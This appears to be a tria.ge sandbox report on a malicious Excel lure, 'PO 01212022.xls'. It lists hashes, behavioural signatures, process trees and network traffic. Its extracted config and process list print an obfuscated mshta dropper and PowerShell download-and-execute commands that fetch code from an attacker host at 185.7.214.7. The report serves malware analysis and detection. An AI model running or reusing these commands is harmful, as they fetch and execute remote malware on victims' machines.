Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    16s
  • max time network
    19s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    21/01/2022, 05:03 UTC

General

  • Target

    PO 01212022.xls

  • Size

    69KB

  • MD5

    3a1495184751bb9daebf21f57c88896d

  • SHA1

    5aa023ed500a7f8b476c404b26e79a7600ecd3d6

  • SHA256

    2c9af469fcb89bb2e93d1ac70ce0bec912b78d5c3cbadccc3040c18dd03f5e41

  • SHA512

    738dee6362259030dafd18956535c5726a3e7bcb783392eb0b9fcc48dc76c6dad8fae675fc56262936847b75b92c2aecbda2c00f6c838eb084a45a027fa3a827

Score
10/10

Malware Config

Extracted

Language
hta
Source
1
mshta http://0xb907d607/fer/fe2.html
URLs
hta.dropper

http://0xb907d607/fer/fe2.html

Extracted

Language
ps1
Deobfuscated
1
# powershell snippet 0
2
$c1 = "(New-Object Net.We"
3
$c4 = "bClient).Downlo"
4
$c3 = "adString('http://185.7.214.7/fer/fe2.png')"
5
$ji = "(New-Object Net.WebClient).DownloadString('http://185.7.214.7/fer/fe2.png')"
6
invoke-expression "(New-Object Net.WebClient).DownloadString('http://185.7.214.7/fer/fe2.png')"|invoke-expression
7
8
# powershell snippet 1
9
(new-object net.webclient).downloadstring("http://185.7.214.7/fer/fe2.png")
10
URLs
ps1.dropper

http://185.7.214.7/fer/fe2.png

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PO 01212022.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3940
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:656
      • C:\Windows\system32\mshta.exe
        mshta http://0xb907d607/fer/fe2.html
        3⤵
        • Blocklisted process makes network request
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:1880
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe2.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
            PID:3280
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
      1⤵
        PID:3664
      • C:\Windows\System32\WaaSMedicAgent.exe
        C:\Windows\System32\WaaSMedicAgent.exe 30ce4e94747d62af19b2b967801c8d0a gQLlMe+ltUaef2OZ+Qktjg.0.1.0.0.0
        1⤵
        • Modifies data under HKEY_USERS
        PID:624
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -pss -s 420 -p 1880 -ip 1880
        1⤵
          PID:3868

        Network

        • flag-us
          DNS
          settings-win.data.microsoft.com
          Remote address:
          8.8.8.8:53
          Request
          settings-win.data.microsoft.com
          IN A
          Response
          settings-win.data.microsoft.com
          IN CNAME
          settingsfd-geo.trafficmanager.net
          settingsfd-geo.trafficmanager.net
          IN A
          20.73.194.208
        • flag-ru
          GET
          http://185.7.214.7/fer/fe2.html
          mshta.exe
          Remote address:
          185.7.214.7:80
          Request
          GET /fer/fe2.html HTTP/1.1
          Accept: */*
          Accept-Language: en-US
          UA-CPU: AMD64
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)
          Host: 185.7.214.7
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.20.1
          Date: Fri, 21 Jan 2022 05:04:08 GMT
          Content-Type: text/html
          Transfer-Encoding: chunked
          Connection: keep-alive
        • 40.126.31.137:443
          login.live.com
          tls
          6.4kB
          19.0kB
          19
          19
        • 20.73.194.208:443
          settings-win.data.microsoft.com
          tls, https
          1.3kB
          8.1kB
          14
          14
        • 127.0.0.1:5985
        • 20.73.194.208:443
          settings-win.data.microsoft.com
          tls, https
          2.5kB
          9.6kB
          15
          16
        • 185.7.214.7:80
          http://185.7.214.7/fer/fe2.html
          http
          mshta.exe
          819 B
          11.7kB
          12
          11

          HTTP Request

          GET http://185.7.214.7/fer/fe2.html

          HTTP Response

          200
        • 8.8.8.8:53
          settings-win.data.microsoft.com
          dns
          77 B
          140 B
          1
          1

          DNS Request

          settings-win.data.microsoft.com

          DNS Response

          20.73.194.208

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/3940-130-0x00007FF7D7270000-0x00007FF7D7280000-memory.dmp

          Filesize

          64KB

        • memory/3940-131-0x00007FF7D7270000-0x00007FF7D7280000-memory.dmp

          Filesize

          64KB

        • memory/3940-132-0x00007FF7D7270000-0x00007FF7D7280000-memory.dmp

          Filesize

          64KB

        • memory/3940-133-0x00007FF7D7270000-0x00007FF7D7280000-memory.dmp

          Filesize

          64KB

        • memory/3940-134-0x00007FF7D7270000-0x00007FF7D7280000-memory.dmp

          Filesize

          64KB

        • memory/3940-137-0x00007FF7D5110000-0x00007FF7D5120000-memory.dmp

          Filesize

          64KB

        • memory/3940-138-0x00007FF7D5110000-0x00007FF7D5120000-memory.dmp

          Filesize

          64KB

        We care about your privacy.

        This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.